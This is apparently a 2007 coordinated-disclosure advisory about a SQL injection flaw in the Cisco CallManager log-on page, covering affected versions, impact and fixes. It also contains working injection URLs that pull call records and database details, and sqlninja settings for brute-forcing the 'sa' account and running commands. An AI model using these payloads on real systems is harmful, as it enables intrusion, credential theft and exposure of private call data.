SUMMARY
=======

A SQL injection vulnerability exists in the Log On page of the web
interface for Cisco CallManager AKA Unified Communications Manager. An
unauthenticated attacker who is able to access the Log On page could
exploit this vulnerability to run arbitrary SQL commands as the logged
in database user, usually cm_publisher. By running SQL commands, the
attacker could gain information about the CallManager configuration,
including call records.

AFFECTED SOFTWARE
=================

* Cisco CallManager prior to v3.3(5)sr2b
* Cisco CallManager prior to v4.1(3)sr5
* Cisco CallManager prior to v4.2(3)sr2
* Cisco CallManager prior to v4.3(1)sr1

Note that I have not personally tested these products - I am simply
reproducing Cisco's information on the issue.

IMPACT
======

An attacker who is able to access the Log On page could harvest a large
amount of data about the Cisco VOIP environment - 260 tables in two
databases. Depending on the target system's configuration, this data
may include sensitive information such as passwords
(ccm0306..PilotUser.Password, ccm0306..syspublications.ftp_password,
ccm0306..sysusers.password) and call records (cdr..CallDetailRecord.*).

The default database user does not appear to have sufficient privileges
to perform operations more destructive than simple SELECT statements -
no INSERT, UPDATE, DELETE, DROP, etc.

It may be possible to use attacks against the exposed MS SQL database
in order to expand the impact of this vulnerability - see Advanced
Exploitation, below.

DETAILS
=======

The log on page of the Cisco Unified CallManager web interface performs
insufficient checking of the "lang" HTTP GET variable before passing it
into a SQL query. By providing a specially crafted lang variable, an
attacker could trick the backend MS SQL server into executing arbitrary
SQL queries as the logged in user.

The affected query returns only a single value, and that value is
placed in a Javascript include URL which is not visible in the rendered
HTML page. As a result, practical exploitation of this vulnerability
can be difficult. Security professionals wishing to test the
vulnerability against their own systems may wish to write wrapper code
to make running repeated queries less tedious.

SOLUTION
========

- Upgrade to an unaffected version of Cisco CallManager

- Enable the URLScan ISAPI filter. This filter ships with CCM and
restricts the maximum length of form fields, making this vulnerability
difficult or impossible to exploit.


EXPLOIT
=======

To see the returned data from these exploit URLs, view the source of
the returned page and look for a line like this:

<SCRIPT language="javascript" src="locales/123/userwebdictionary.js"></SCRIPT>

The string "123" is the value returned from the database.

Examples:

Display the logged-in database user.

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

Display the selected database.

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

Display the UNIX time at which a call was made from extension 12345.

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

Display the destination number for that call. Replace "1174900000" with
the value from the previous query.

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

ADVANCED EXPLOITATION
=====================

Several free tools exist to automate attacking SQL injection
vulnerabilities like this one. Depending on the configuration of the
target server, it may be possible to escalate database privileges or
run arbitrary system commands.

For example, icesurfer's excellent sqlninja tool (>= 0.1.3) can be used
to detemine various information about the server hosting the
CallManager install, launch a brute-force attack against the database
"sa" account password, and run arbitrary commands on the server if the
"sa" attack succeeds.

http://sqlninja.sourceforge.net/

The following parameters should be specified in the sqlninja.conf file:

page = /ccmuser/logon.asp
stringstart = lang=en';
stringend = select tkUserLocale from UserLocaleBrowserLanguageMap M where ''='
appendcomment = no

In at least one instance, an unsuccessful brute-force attack against
the "sa" password led to denial-of-service conditions on the
CallManager server.

CREDITS
=======

Brandeis University worked with Cisco to release this information in a
responsible manner. Cisco has released a Security Advisory on this
issue at:

http://www.cisco.com/warp/public/707/cisco-sa-20070829-ccm.shtml

I would also like to thank icesurfer for his work modifying sqlninja to
work with this exploit.

REVISION HISTORY
================

2007-08-30  original release

-- 
Elliot Kendall <ekendall@brandeis.edu>
Network Security Architect
Brandeis University

Trouble replying? See http://people.brandeis.edu/~ekendall/sign/